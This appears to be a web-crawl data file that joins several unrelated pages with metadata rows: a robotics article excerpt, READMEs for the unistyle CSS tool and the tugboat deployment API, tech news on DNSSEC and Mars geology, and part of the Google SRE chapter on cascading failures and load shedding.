“I see Spot right now as more of a ground reconnaissance asset,” said Capt. James Pineiro, the Ground Combat Element branch head for the Warfighting Lab. “The problem is, Spot in its current configuration doesn't have the autonomy to do that. It has the ability to walk in its environment, but it's completely controller-driven.”
For now, both Spot and LS3 are in storage, with no future experiments or upgrades planned. Pineiro said it would take a new contract and some new interest from Marine Corps top brass to resurrect the program.
For the life of me I don’t know how anyone can **not** be interested in Spot. Here’s one more video from Jurvetson; it’s a lot of fun to see the robot just being played with in a completely unstructured way:
*Updated 2/29/16 9:20 pm ET: Added comments from Steve Jurvetson. Updated 3/1/16 2 pm ET: Corrected name of Andy Rubin’s dog. Erico Guizzo contributed reporting.*
Evan Ackerman is a senior editor at *IEEE Spectrum*. Since 2007, he has written over 6,000 articles on robotics and technology. He has a degree in Martian geology and is excellent at playing bagpipes.
| true | true | true |
Boston Dynamics' dog Spot meets Andy Rubin's dog Alex
|
2024-10-12 00:00:00
|
2016-02-29 00:00:00
|
article
|
ieee.org
|
IEEE Spectrum
| null | null |
|
10,182,857 |
https://github.com/joakimbeng/unistyle
|
GitHub - joakimbeng/unistyle: Write modular and scalable CSS using the next version of ECMAScript
|
Joakimbeng
|
Write modular and scalable CSS using the next version of ECMAScript.
Using ES2015 (and some ES2016) features to write CSS in JavaScript makes it really modular, scalable and gives you in practice all the features of a good CSS pre- or postprocessor, without resorting to a new language. See the example section for use together with React for how to avoid the annoying cascading feature of CSS, which is troublesome in large scale CSS.
The name is an abbreviation of Uniform Stylesheets. It is also somewhat related to Universal JavaScript, or whatever you want to call it, because of the ability to share the same CSS code written in JavaScript between your frontend components' inline styles and the application's complete CSS.
Install `unistyle`
using npm:
`npm install --save unistyle`
```
$> unistyle --help
Write modular and scalable CSS using the next version of ECMAScript.
Usage:
unistyle [options] <path to module>
Options:
-o, --output Output compiled CSS to specified file instead of to stdout [string]
-h, --help Show help [boolean]
-v, --version Show version number [boolean]
Examples:
unistyle -o app.css src/styles.js Compile src/styles.js to app.css
```
**Note:** All examples below assumes you're already using Babel in your project. Or perhaps `unistyle-loader`
together with a Babel loader and Webpack.
The examples source code can be found in `./examples`
and their compiled counterparts in `./examples-es5`
.
*You can use either CommonJS modules or the new ES2015 modules syntax.*
In `examples/vars/vars.js`
:
```
export const padding = '15px';
export const dark = '#333';
```
In `examples/vars/button.js`
:
```
import {padding, dark} from './vars';
export default {
'.btn': {
padding,
border: `1px solid ${dark}`
}
};
```
In `examples/vars/index.js`
:
```
import {padding} from './vars';
import button from './button';
export default {
body: {
padding
},
...button
};
```
Compiling to CSS with `unistyle examples-es5/vars`
will give the following result:
```
body, .btn {
padding: 15px;
}
.btn {
border: 1px solid #333;
}
```
*Every preprocessor I can think of (e.g. LESS, Sass and Stylus) has the ability to extend one CSS declaration with another, for reusability. They all have their own syntax; with Unistyle, however, you can use the object rest spread syntax (which you should already be using if Babel is your thing):*
In `examples/extend/common.js`
:
```
export const bigAndPadded = {
fontSize: 100,
padding: 50
};
```
In `examples/extend/button.js`
:
```
import {bigAndPadded} from './common';
export default {
button: {
...bigAndPadded,
border: '5px solid black'
}
};
```
Compiling to CSS with `unistyle examples-es5/extend/button`
will give the following:
```
button {
font-size: 100px;
padding: 50px;
border: 5px solid black;
}
```
*Using media queries (which bubble up to the root) is easier than ever using the computed property names syntax:*
In `examples/mediaqueries/breakpoints.js`
:
```
export const palm = '@media only screen and (max-width: 700px)';
export const small = '@media only screen and (max-width: 1000px)';
```
In `examples/mediaqueries/index.js`
:
```
import {palm} from './breakpoints';
export default {
body: {
fontSize: 20,
[palm]: {
fontSize: 16
}
}
};
```
Compiling with `unistyle examples-es5/mediaqueries`
will give:
```
body {
font-size: 20px;
}
@media only screen and (max-width: 700px) {
body {
font-size: 16px;
}
}
```
You can specify multiple `@font-face`
declarations using arrays.
In `examples/font-faces/index.js`
:
```
export default {
'@font-face': [
font('my-web-font', 'webfont'),
font('my-other-font', 'otherfont')
]
};
function font(family, filename) {
return {
fontFamily: `"${family}"`,
src: [
`url("${filename}.eot")`,
[
`url("${filename}.eot?#iefix") format("embedded-opentype")`,
`url("${filename}.woff2") format("woff2")`,
`url("${filename}.woff") format("woff")`,
`url("${filename}.ttf") format("truetype")`,
`url("${filename}.svg?#svgFontName") format("svg")`
].join(', ')
]
};
}
```
Compiling with `unistyle examples-es5/font-faces`
will give:
```
@font-face {
font-family: "my-web-font";
src: url("webfont.eot");
src: url("webfont.eot?#iefix") format("embedded-opentype"), url("webfont.woff2") format("woff2"), url("webfont.woff") format("woff"), url("webfont.ttf") format("truetype"), url("webfont.svg?#svgFontName") format("svg");
}
@font-face {
font-family: "my-other-font";
src: url("otherfont.eot");
src: url("otherfont.eot?#iefix") format("embedded-opentype"), url("otherfont.woff2") format("woff2"), url("otherfont.woff") format("woff"), url("otherfont.ttf") format("truetype"), url("otherfont.svg?#svgFontName") format("svg");
}
```
A CSS module written for Unistyle is already compatible with React inline styles, so you could just `import`
/`require`
it like so:
In `examples/react/inline/button-style.js`
:
```
export default {
padding: 15,
border: '2px solid black'
};
```
In `examples/react/inline/button.js`
:
```
import React from 'react';
import buttonStyle from './button-style';
export default class Button extends React.Component {
render() {
return <button style={buttonStyle}>My button</button>;
}
}
```
No compilation step is needed here...
*Note: this is not limited to React but works with almost any frontend framework/library, if you're using Browserify, Webpack or similar.*
Using the modules `cngen`
and `classnameify`
respectively makes it possible to keep all CSS for your React components in its own file. As a bonus you get round the biggest problem with large scale CSS, i.e. the fact that it cascades.
In `examples/react/separate/button-style.js`
:
```
export default {
'padding': 15,
'border': '2px solid black',
':hover': {
borderColor: 'green'
}
};
```
In `examples/react/separate/button.js`
:
```
import React from 'react';
import cngen from 'cngen';
import buttonStyle from './button-style';
export default class Button extends React.Component {
render() {
const buttonClass = cngen(buttonStyle);
return <button className={buttonClass}>My button</button>;
}
}
```
In `examples/react/separate/styles.js`
:
```
import classnameify from 'classnameify';
import buttonStyle from './button-style';
export default classnameify({
buttonStyle
});
```
Compiling to CSS with `unistyle examples-es5/react/separate/styles.js`
, gives the following CSS:
```
._cf2b82a {
padding: 15px;
border: 2px solid black;
}
._cf2b82a:hover {
border-color: green;
}
```
### Publishing Unistyle modules to npm
Because Unistyle CSS modules are JavaScript only, they are easily reused if you publish them to npm, after which they can be installed and imported/required. Babel module best practices still apply though, i.e. you should transpile your code before publishing.
When publishing a Unistyle CSS module to `npm`
I recommend adding `"unistyle"`
as a keyword in your `package.json`
for easier discoverability.
When adding third party modules to your app's Unistyle CSS you should export an array instead of an object, for instance with `normalize-unistyle`
:
```
import normalize from 'normalize-unistyle';
import myStyles from './my-styles';
export default [
normalize,
myStyles
];
```
This is to have colliding selectors in `normalize-unistyle`
and `myStyles`
merged instead of overwritten.
E.g. compiling this (`examples/third-party/object.js`
):
```
const thirdParty = {
body: {
color: 'black'
}
};
const myStyles = {
body: {
backgroundColor: 'white'
}
};
export default {
...thirdParty,
...myStyles
};
```
Will yield the *unexpected* result:
```
body {
background-color: white;
}
```
And instead compiling this (`examples/third-party/array.js`
):
```
const thirdParty = {
body: {
color: 'black'
}
};
const myStyles = {
body: {
backgroundColor: 'white'
}
};
export default [
thirdParty,
myStyles
];
```
Will yield the *expected* result:
```
body {
color: black;
background-color: white;
}
```
Use existing modules for this.
### Using `cssmin`
for minification
`npm install --save unistyle cssmin`
Then you can add a `build`
script to `package.json`
like so:
```
{
"scripts": {
"build": "unistyle styles/ | cssmin > styles.min.css"
}
}
```
And then run: `npm run build`
to create `styles.min.css`
.
### Using `autoprefixer`
for prefixing
`npm install --save unistyle postcss-cli autoprefixer`
Then you can add a `build`
script to `package.json`
like so:
```
{
"scripts": {
"build": "unistyle styles/ | postcss --use autoprefixer -o styles.css"
}
}
```
And then run: `npm run build`
to create `styles.css`
.
~~Unistyle uses Babel and AbsurdJS~~ under the hood. Unistyle does not use Babel or AbsurdJS anymore. It's up to you to use Babel if you want to, or stick with the ES2015 features currently in Node v4 or v5. Instead of AbsurdJS Unistyle uses `unistyle-flat`
to allow nesting of styles and `to-css`
to compile to CSS. This is because AbsurdJS had so many more features than are actually needed which makes Unistyle less magical now.
Unistyle also uses `kebab-case`
and `pixelify`
to be able to write CSS properties in camelCase (to lessen the need for quotes) and to append values with `'px'`
when appropriate, i.e. `{fontSize: 10} => font-size: 10px;`
. This makes your Unistyle modules compatible with React inline styles.
**Note:** `to-css`
's feature to set a property multiple times should not be used in your inline styles and only in your compiled stylesheet.
| Name | Type | Description |
|---|---|---|
| `obj` | `Object` / `Array` | The Unistyle CSS object (or array of objects) to compile |

Returns: `Promise`, which resolves to the compiled CSS string.
MIT @ Joakim Carlstein
| true | true | true |
Write modular and scalable CSS using the next version of ECMAScript - joakimbeng/unistyle
|
2024-10-12 00:00:00
|
2015-09-03 00:00:00
|
https://opengraph.githubassets.com/9ad7623d6ef8f97be9349fc7847e45e51876ca5c13de4128958467404b78f8bf/joakimbeng/unistyle
|
object
|
github.com
|
GitHub
| null | null |
7,305,206 |
https://github.com/remind101/shipr
|
GitHub - remind101/tugboat: Rest API and AngularJS client for deploying github repos.
|
Remind
|
Tugboat is an API and AngularJS client for aggregating deployments of GitHub repos.
Tugboat by itself isn't all that exciting; it won't perform deployments for you, but it does provide an API for deployment providers to hook into.
Writing your own providers is really simple and you can write them in any language that you want.
Tugboat exposes an API for registering deployments, adding logs, and updating statuses. For an example of how to create an external provider with Go, see provider_test.go.
The API expects the `user`
part of a basic auth `Authorization`
header to be a provider auth token. You can generate a provider auth token using the following:
```
$ tugboat tokens create <provider>
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJQcm92aWRlciI6ImZvbyJ9.UYMrZD7cgBdeEXLf11nwEiZpUI2DuOdRsGOZyG2SluU
```
Creates a new Deployment within tugboat. In general, this would include a post body extracted from a GitHub `deployment`
event webhook payload.
The response from this endpoint will be a `Deployment`
resource.
```
POST /deployments
```
**Example Request**
```
{
"ID": 1234,
"Sha": "abcd...xyz",
"Ref": "master"
}
```
**Example Response**
```
{
"ID": "01234567-89ab-cdef-0123-456789abcdef",
"Repo": "remind101/r101-api",
"Token": "01234567-89ab-cdef-0123-456789abcdef"
}
```
This adds lines of logs to the deployment. You can simply stream your logs and they will be added as they come in. Logs show up automatically in the UI via pusher events.
```
POST /deployments/:id/logs
```
**Example Request**
```
Authorization: dXNlcjo=\n
Deploying to production
Deployed
```
Updates the status of the deployment. The `status`
field should be one of `succeeded`
, `failed`
or `errored`
. If the `status`
is `errored`
then you can provide an `error`
field with details about the error. This will also update the status of the deployment within GitHub itself.
```
POST /deployments/:id/status
```
**Example Request**
```
{
"status": "succeeded"
}
```
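As a rough illustration (the host and deployment ID below are placeholders), posting a status update with `curl` would look something like this, with the provider token supplied as the “user” part of basic auth:

```
curl -u "$TUGBOAT_TOKEN:" \
     -H "Content-Type: application/json" \
     -d '{"status": "succeeded"}' \
     http://tugboat.example.com/deployments/01234567-89ab-cdef-0123-456789abcdef/status
```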
- Git clone this repo into `$GOPATH/src/github.com/remind101/tugboat`
- Run the `before_install` steps in `.travis.yml` to set up dependencies and env.
- Run the `script` steps in `.travis.yml` to test your setup.
| true | true | true |
Rest API and AngularJS client for deploying github repos. - remind101/tugboat
|
2024-10-12 00:00:00
|
2013-04-29 00:00:00
|
https://opengraph.githubassets.com/0565d8388046032fdbcb9e3c3d891452f8de5138d9b2708406ac3fac492e4816/remind101/tugboat
|
object
|
github.com
|
GitHub
| null | null |
39,986,479 |
https://blogs-cloud-updates-1.greptime-website.pages.dev/blogs/
|
Greptime Blog | Cloud-scale, Fast and Efficient Time Series Data Infrastructure
|
Sunng
|
Engineering
• May 12, 2023
### How Out-of-Order Data is Handled in Time-series Databases
Time-series databases are domain-specific databases. Ideally, we assume that data is written in real time and in a sequential manner. However, in the real world, situations are often more complex. Data may be out of order due to sensor failures, network latency, power outages, etc., posing challenges to time-series databases. In this article, we dive into the impact of out-of-order data in time-series databases and learn how to optimize its handling.
| true | true | true |
Greptime Blog
|
2024-10-12 00:00:00
|
2024-04-11 00:00:00
|
website
|
greptime.com
|
greptime.com
| null | null |
|
13,704,161 |
https://www.theregister.co.uk/2017/02/22/dutch_banking_industry_security_bad/
|
How's your online bank security looking? The Dutch studied theirs and... yeah, not great
|
Kieren McCarthy
|
# How's your online bank security looking? The Dutch studied theirs and... yeah, not great
## Just six per cent of banks using DNSSEC on domains
The Dutch banking industry is doing a terrible job of online security, according to the company that runs the country's .nl internet domains.
In a new report published Tuesday, the internet registry SIDN was surprised to find that just six per cent of banks using .nl internet addresses have the security protocol DNSSEC in place to protect their digital assets and their customers.
"Banks should be the main users of DNSSEC security," said SIDN CEO Roelof Meijer, "but they scored – for the second time in a row – the worst of all investigated domains."
He also pointed out that with online banking becoming ever more important, it was incumbent on the industry to adopt the latest security standards. "With the closing of physical bank branches and a reduction in the number of ATMs, the online front door of the banks is becoming increasingly important," said Meijer. "Moreover, of all companies, they suffer the most from phishing and spoofing, something DNSSEC in conjunction with DKIM and DMARC can protect against."
SIDN looked at just over 7,000 .nl domains owned by a range of industries from government to business to banking and telecoms to determine whether they were using the security protocol.
Top of the list, unsurprisingly, came the internet infrastructure industry, with 64 per cent of internet addresses secured by DNSSEC. But government came an impressive second with 59 per cent – something SIDN says is a direct result of policy.
### DKIM Dotcom
Last year, the Dutch interior minister directed all local government websites to adopt DNSSEC by the end of 2017, and new security standards that build on top of DNSSEC for email (STARTTLS and DKIM) have also encouraged take-up.
Business has a passable take-up of 30 per cent (up from 23 per cent in 2014) and the internet/telecom industry was surprisingly low with just 25 per cent take-up.
While there has been a significant pick-up in the use of DNSSEC, it is still below what internet engineers want to see – although it is still doing much better than IPv6.
If a domain name is secured with DNSSEC it makes it much harder for criminals to misdirect people to a different address, as the DNS system itself checks on its validity.
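For the curious, it is easy to check from the command line whether a given domain is signed; the domain below is purely illustrative:

```
# Ask for DNSSEC data: a signed domain returns RRSIG records alongside the
# answer, and a validating resolver will set the "ad" (authenticated data) flag.
dig +dnssec sidn.nl A

# Check whether the parent zone publishes a DS record for the domain.
dig sidn.nl DS
```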
The technology has been a long time coming and was, initially at least, very expensive and complicated to install. It is still far from simple or cheap, but internet infrastructure companies have been working with it for some time, and most recently ICANN determined that all new internet registries would have to work with DNSSEC, giving the protocol a boost.
Partly as a result of the recent take-up, DNSSEC has started to become a foundation on which other applications are being built, securing both communications and email: examples being DKIM, SPF, DANE and DMARC.
"It's hard to think of any good reason for not implementing DNSSEC protection," Meijer argued. "We believe that it's now up to the big internet service providers to act." ®
| true | true | true |
Just six per cent of banks using DNSSEC on domains
|
2024-10-12 00:00:00
|
2017-02-22 00:00:00
| null |
article
|
theregister.com
|
The Register
| null | null |
7,673,986 |
http://arstechnica.com/tech-policy/2014/04/scotus-struggles-to-find-a-search-and-seizure-rule-for-the-digital-age/
|
SCOTUS struggles to find a search and seizure rule for the digital age
|
Joe Silver
|
The US Supreme Court justices heard oral arguments on Tuesday morning in two companion cases revolving around whether police officers need a warrant to search a suspect's cell phone upon arrest: *United States v. Wurie* involves an old-fashioned flip-phone, while *Riley v. California* centers on a modern smartphone.
The specific issue before the court in *Riley* is currently the more interesting debate. Does an arrest alone allow a police officer to search the vast troves of data available on a person's smartphone? In David Riley's case, his phone held a potentially incriminating photo: Riley was standing next to a red Oldsmobile allegedly involved in a prior shooting, but the car was not directly connected to the reason for Riley’s current arrest.
So during two spirited hours today, justices and counsel alike name-dropped a host of technologies and digital platforms, including Twitter, Facebook, Fitbits, GPS, airplane mode, Faraday bags, encryption, online dating apps, and several others in an effort to craft what amounts to an appropriate search and seizure rule for the digital age. And while justices appeared all too willing to try to strut their technological proficiency—some more successfully than others—the task at hand was to determine whether warrantless searches of cell phones and other devices in a suspect’s proximity "incident to arrest" are acceptable under the US Constitution’s Fourth Amendment, which forbids “unreasonable” searches and seizures.
## New rule for a new world
Most of the justices during the *Riley* argument appeared to agree that computers have changed the world to such an extent that a new computer-specific rule is now necessary for searches incident to arrest. They seemed to further agree that police should not have unfettered access to all of the information on one’s cell phone just because it is on one's person during an arrest.
| true | true | true |
Pair of justices lean toward always requiring a warrant; most want a middle ground.
|
2024-10-12 00:00:00
|
2014-04-29 00:00:00
|
article
|
arstechnica.com
|
Ars Technica
| null | null |
|
40,223,457 |
https://discover.lanl.gov/news/0501-ancient-mars/
|
New findings point to an Earth-like environment on ancient Mars
|
Los Alamos National Laboratory
|
A research team using the ChemCam instrument onboard NASA’s Curiosity rover discovered higher-than-usual amounts of manganese in lakebed rocks within Gale Crater on Mars, which indicates that the sediments were formed in a river, delta, or near the shoreline of an ancient lake. The results were published today in Journal of Geophysical Research: Planets.
“It is difficult for manganese oxide to form on the surface of Mars, so we didn’t expect to find it in such high concentrations in a shoreline deposit,” said Patrick Gasda, of Los Alamos National Laboratory’s Space Science and Applications group and lead author on the study. “On Earth, these types of deposits happen all the time because of the high oxygen in our atmosphere produced by photosynthetic life, and from microbes that help catalyze those manganese oxidation reactions.
“On Mars, we don’t have evidence for life, and the mechanism to produce oxygen in Mars’s ancient atmosphere is unclear, so how the manganese oxide was formed and concentrated here is really puzzling. These findings point to larger processes occurring in the Martian atmosphere or surface water and shows that more work needs to be done to understand oxidation on Mars,” Gasda added.
ChemCam, which was developed at Los Alamos and CNES (the French space agency), uses a laser to form a plasma on the surface of a rock, and collects that light in order to quantify elemental composition in rocks.
The sedimentary rocks explored by the rover are a mix of sands, silts, and muds. The sandy rocks are more porous, and groundwater can more easily pass through sands compared to the muds that make up most of the lakebed rocks in the Gale Crater. The research team looked at how manganese could have been enriched in these sands—for example, by percolation of groundwater through the sands on the shore of a lake or mouth of a delta—and what oxidant could be responsible for the precipitation of manganese in the rocks.
On Earth, manganese becomes enriched because of oxygen in the atmosphere, and this process is often sped up by the presence of microbes. Microbes on Earth can use the many oxidation states of manganese as energy for metabolism; if life was present on ancient Mars, the increased amounts of manganese in these rocks along the lake shore would have been a helpful energy source for life.
“The Gale lake environment, as revealed by these ancient rocks, gives us a window into a habitable environment that looks surprisingly similar to places on Earth today,” said Nina Lanza, principal investigator for the ChemCam instrument. “Manganese minerals are common in the shallow, oxic waters found on lake shores on Earth, and it's remarkable to find such recognizable features on ancient Mars.”
**Paper**: “Manganese-rich sandstones as an indicator of ancient oxic lake water conditions in Gale Crater, Mars” Journal of Geophysical Research: Planets.
**Funding**: NASA Jet Propulsion Laboratory
| true | true | true |
Manganese-rich sandstones indicate there were once habitable conditions in the Gale Crater
|
2024-10-12 00:00:00
|
2024-05-01 00:00:00
|
website
|
lanl.gov
|
Los Alamos National Laboratory
| null | null |
|
40,278,452 |
https://sre.google/sre-book/addressing-cascading-failures/#xref_cascading-failure_load-shed-graceful-degredation
|
Addressing Cascading Failures
|
Mike Ulrich
|
# Addressing Cascading Failures
If at first you don't succeed, back off exponentially.
Why do people always forget that you need to add a little jitter?
A cascading failure is a failure that grows over time as a result of positive feedback. It can occur when a portion of an overall system fails, increasing the probability that other portions of the system fail. For example, a single replica for a service can fail due to overload, increasing load on remaining replicas and increasing their probability of failing, causing a domino effect that takes down all the replicas for a service.
We’ll use the Shakespeare search service discussed in Shakespeare: A Sample Service as an example throughout this chapter. Its production configuration might look something like Figure 22-1.
# Causes of Cascading Failures and Designing to Avoid Them
Well-thought-out system design should take into account a few typical scenarios that account for the majority of cascading failures.
## Server Overload
The most common cause of cascading failures is overload. Most cascading failures described here are either directly due to server overload, or due to extensions or variations of this scenario.
Suppose the frontend in cluster A is handling 1,000 requests per second (QPS), as in Figure 22-2.
If cluster B fails (Figure 22-3), requests to cluster A increase to 1,200 QPS. The frontends in A are not able to handle requests at 1,200 QPS, and therefore start running out of resources, which causes them to crash, miss deadlines, or otherwise misbehave. As a result, the rate of successfully handled requests in A dips well below 1,000 QPS.
This reduction in the rate of useful work being done can spread into other failure domains, potentially spreading globally. For example, local overload in one cluster may lead to its servers crashing; in response, the load balancing controller sends requests to other clusters, overloading their servers, leading to a service-wide overload failure. It may not take long for these events to transpire (e.g., on the order of a couple minutes), because the load balancer and task scheduling systems involved may act very quickly.
## Resource Exhaustion
Running out of a resource can result in higher latency, elevated error rates, or the substitution of lower-quality results. These are in fact desired effects of running out of resources: something eventually needs to give as the load increases beyond what a server can handle.
Depending on what resource becomes exhausted in a server and how the server is built, resource exhaustion can render the server less efficient or cause the server to crash, prompting the load balancer to distribute the resource problems to other servers. When this happens, the rate of successfully handled requests can drop and possibly send the cluster or an entire service into a cascade failure.
Different types of resources can be exhausted, resulting in varying effects on servers.
### CPU
If there is insufficient CPU to handle the request load, typically all requests become slower. This scenario can result in various secondary effects, including the following:
- Increased number of in-flight requests
- Because requests take longer to handle, more requests are handled concurrently (up to a possible maximum capacity at which queuing may occur). This affects almost all resources, including memory, number of active threads (in a thread-per-request server model), number of file descriptors, and backend resources (which in turn can have other effects).
- Excessively long queue lengths
- If there is insufficient capacity to handle all the requests at steady state, the server will saturate its queues. This means that latency increases (the requests are queued for longer amounts of time) and the queue uses more memory. See Queue Management for a discussion of mitigation strategies.
- Thread starvation
- When a thread can’t make progress because it’s waiting for a lock, health checks may fail if the health check endpoint can’t be served in time.
- CPU or request starvation
- Internal watchdogs in the server detect that the server isn’t making progress, causing the servers to crash due to CPU starvation, or due to request starvation if watchdog events are triggered remotely and processed as part of the request queue.
- Missed RPC deadlines
- As a server becomes overloaded, its responses to RPCs from its clients arrive later, which may exceed any deadlines those clients set. The work the server did to respond is then wasted, and clients may retry the RPCs, leading to even more overload.
- Reduced CPU caching benefits
- As more CPU is used, the chance of spilling on to more cores increases, resulting in decreased usage of local caches and decreased CPU efficiency.
### Memory
If nothing else, more in-flight requests consume more RAM from allocating the request, response, and RPC objects. Memory exhaustion can cause the following effects:
- Dying tasks
- For example, a task might be evicted by the container manager (VM or otherwise) for exceeding available resource limits, or application-specific crashes may cause tasks to die.
- Increased rate of garbage collection (GC) in Java, resulting in increased CPU usage
- A vicious cycle can occur in this scenario: less CPU is available, resulting in slower requests, resulting in increased RAM usage, resulting in more GC, resulting in even lower availability of CPU. This is known colloquially as the “GC death spiral.”
- Reduction in cache hit rates
- Reduction in available RAM can reduce application-level cache hit rates, resulting in more RPCs to the backends, which can possibly cause the backends to become overloaded.
### Threads
Thread starvation can directly cause errors or lead to health check failures. If the server adds threads as needed, thread overhead can use too much RAM. In extreme cases, thread starvation can also cause you to run out of process IDs.
### File descriptors
Running out of file descriptors can lead to the inability to initialize network connections, which in turn can cause health checks to fail.
### Dependencies among resources
Note that many of these resource exhaustion scenarios feed from one another—a service experiencing overload often has a host of secondary symptoms that can look like the root cause, making debugging difficult.
For example, imagine the following scenario:
- A Java frontend has poorly tuned garbage collection (GC) parameters.
- Under high (but expected) load, the frontend runs out of CPU due to GC.
- CPU exhaustion slows down completion of requests.
- The increased number of in-progress requests causes more RAM to be used to process the requests.
- Memory pressure due to requests, in combination with a fixed memory allocation for the frontend process as a whole, leaves less RAM available for caching.
- The reduced cache size means fewer entries in the cache, in addition to a lower hit rate.
- The increase in cache misses means that more requests fall through to the backend for servicing.
- The backend, in turn, runs out of CPU or threads.
- Finally, the lack of CPU causes basic health checks to fail, starting a cascading failure.
In situations as complex as the preceding scenario, it’s unlikely that the causal chain will be fully diagnosed during an outage. It might be very hard to determine that the backend crash was caused by a decrease in the cache rate in the frontend, particularly if the frontend and backend components have different owners.
## Service Unavailability
Resource exhaustion can lead to servers crashing; for example, servers might crash when too much RAM is allocated to a container. Once a couple of servers crash on overload, the load on the remaining servers can increase, causing them to crash as well. The problem tends to snowball and soon all servers begin to crash-loop. It’s often difficult to escape this scenario because as soon as servers come back online they’re bombarded with an extremely high rate of requests and fail almost immediately.
For example, if a service was healthy at 10,000 QPS, but started a cascading failure due to crashes at 11,000 QPS, dropping the load to 9,000 QPS will almost certainly not stop the crashes. This is because the service will be handling increased demand with reduced capacity; only a small fraction of servers will usually be healthy enough to handle requests. The fraction of servers that will be healthy depends on a few factors: how quickly the system is able to start the tasks, how quickly the binary can start serving at full capacity, and how long a freshly started task is able to survive the load. In this example, if 10% of the servers are healthy enough to handle requests, the request rate would need to drop to about 1,000 QPS in order for the system to stabilize and recover.
Similarly, servers can appear unhealthy to the load balancing layer, resulting in reduced load balancing capacity: servers may go into “lame duck” state (see A Robust Approach to Unhealthy Tasks: Lame Duck State) or fail health checks without crashing. The effect can be very similar to crashing: more servers appear unhealthy, the healthy servers tend to accept requests for a very brief period of time before becoming unhealthy, and fewer servers participate in handling requests.
Load balancing policies that avoid servers that have served errors can exacerbate problems further—a few backends serve some errors, so they don’t contribute to the available capacity for the service. This increases the load on the remaining servers, starting the snowball effect.
# Preventing Server Overload
The following list presents strategies for avoiding server overload in rough priority order:
- Load test the server’s capacity limits, and test the failure mode for overload
- This is the most important exercise you should conduct in order to prevent server overload. Unless you test in a realistic environment, it’s very hard to predict exactly which resource will be exhausted and how that resource exhaustion will manifest. For details, see Testing for Cascading Failures.
- Serve degraded results
- Serve lower-quality, cheaper-to-compute results to the user. Your strategy here will be service-specific. See Load Shedding and Graceful Degradation.
- Instrument the server to reject requests when overloaded
- Servers should protect themselves from becoming overloaded and crashing. When overloaded at either the frontend or backend layers, fail early and cheaply. For details, see Load Shedding and Graceful Degradation.
- Instrument higher-level systems to reject requests, rather than overloading servers
- Note that because rate limiting often doesn’t take overall service health into account, it may not be able to stop a failure that has already begun. Simple rate-limiting implementations are also likely to leave capacity unused. Rate limiting can be implemented in a number of places:
  - *At the reverse proxies*, by limiting the volume of requests by criteria such as IP address to mitigate attempted denial-of-service attacks and abusive clients.
  - *At the load balancers*, by dropping requests when the service enters global overload. Depending on the nature and complexity of the service, this rate limiting can be indiscriminate (“drop all traffic above X requests per second”) or more selective (“drop requests that aren’t from users who have recently interacted with the service” or “drop requests for low-priority operations like background synchronization, but keep serving interactive user sessions”).
  - *At individual tasks*, to prevent random fluctuations in load balancing from overwhelming the server.
- Perform capacity planning
- Good capacity planning can reduce the probability that a cascading failure will occur. Capacity planning should be coupled with performance testing to determine the load at which the service will fail. For instance, if every cluster’s breaking point is 5,000 QPS, the load is evenly spread across clusters, and the service’s peak load is 19,000 QPS, then approximately six clusters are needed to run the service at *N* + 2 (the arithmetic is spelled out in the short sketch after this list).
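Spelling out that arithmetic as a quick sketch (ours, not part of the original chapter):

```
import math

cluster_breaking_point_qps = 5_000   # load at which a single cluster starts to fail
peak_load_qps = 19_000               # service-wide peak load

n = math.ceil(peak_load_qps / cluster_breaking_point_qps)  # 4 clusters just to serve peak
clusters_needed = n + 2                                    # tolerate 2 cluster outages
print(clusters_needed)                                     # -> 6
```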
Capacity planning reduces the probability of triggering a cascading failure, but it is not sufficient to protect the service from cascading failures. When you lose major parts of your infrastructure during a planned or unplanned event, no amount of capacity planning may be sufficient to prevent cascading failures. Load balancing problems, network partitions, or unexpected traffic increases can create pockets of high load beyond what was planned. Some systems can grow the number of tasks for your service on demand, which may prevent overload; however, proper capacity planning is still needed.
## Queue Management
Most thread-per-request servers use a queue in front of a thread pool to handle requests. Requests come in, they sit on a queue, and then threads pick requests off the queue and perform the actual work (whatever actions are required by the server). Usually, if the queue is full, the server will reject new requests.
If the request rate and latency of a given task is constant, there is no reason to queue requests: a constant number of threads should be occupied. Under this idealized scenario, requests will only be queued if the steady state rate of incoming requests exceeds the rate at which the server can process requests, which results in saturation of both the thread pool and the queue.
Queued requests consume memory and increase latency. For example, suppose the queue size is 10x the number of threads and the time to handle a request on a thread is 100 milliseconds. If the queue is full, then a request will take 1.1 seconds to handle, most of that time spent waiting on the queue.
For a system with fairly steady traffic over time, it is usually better to have small queue lengths relative to the thread pool size (e.g., 50% or less), which results in the server rejecting requests early when it can’t sustain the rate of incoming requests. For example, Gmail often uses queueless servers, relying instead on failover to other server tasks when the threads are full. On the other end of the spectrum, systems with “bursty” load for which traffic patterns fluctuate drastically may do better with a queue size based on the current number of threads in use, processing time for each request, and the size and frequency of bursts.
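As a minimal illustration of the “small bounded queue, reject early” idea (our sketch, not from the original text; `handle()` stands in for real request processing):

```
import queue
import threading

NUM_THREADS = 8
QUEUE_SIZE = NUM_THREADS // 2        # queue length kept at ~50% of the thread pool


def handle(request) -> None:
    """Placeholder for application-specific request processing."""


def worker() -> None:
    while True:
        request = work_queue.get()
        try:
            handle(request)
        finally:
            work_queue.task_done()


work_queue: queue.Queue = queue.Queue(maxsize=QUEUE_SIZE)

for _ in range(NUM_THREADS):
    threading.Thread(target=worker, daemon=True).start()


def submit(request) -> bool:
    """Enqueue a request, or reject it immediately (e.g., with an HTTP 503)
    rather than letting it sit on an ever-growing queue."""
    try:
        work_queue.put_nowait(request)
        return True
    except queue.Full:
        return False
```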
## Load Shedding and Graceful Degradation
*Load shedding* drops some proportion of load by dropping traffic as the server approaches overload conditions. The goal is to keep the server from running out of RAM, failing health checks, serving with extremely high latency, or any of the other symptoms associated with overload, while still doing as much useful work as it can.
One straightforward way to shed load is to do per-task throttling based on CPU, memory, or queue length; limiting queue length as discussed in Queue Management is a form of this strategy. For example, one effective approach is to return an HTTP 503 (service unavailable) to any incoming request when there are more than a given number of client requests in flight.
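As a rough illustration (the 200-request limit and the handler wiring are assumptions, not from the text), a per-task throttle of this kind can be as simple as counting in-flight requests and answering 503 once the count passes the limit:

```
package main

import (
	"net/http"
	"sync/atomic"
)

const maxInflight = 200 // assumed per-task limit on concurrent requests

var inflight int64

// withLoadShedding rejects work early with a 503 when too many requests are
// already in flight, rather than queueing them and risking memory exhaustion.
func withLoadShedding(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if atomic.AddInt64(&inflight, 1) > maxInflight {
			atomic.AddInt64(&inflight, -1)
			http.Error(w, "overloaded", http.StatusServiceUnavailable)
			return
		}
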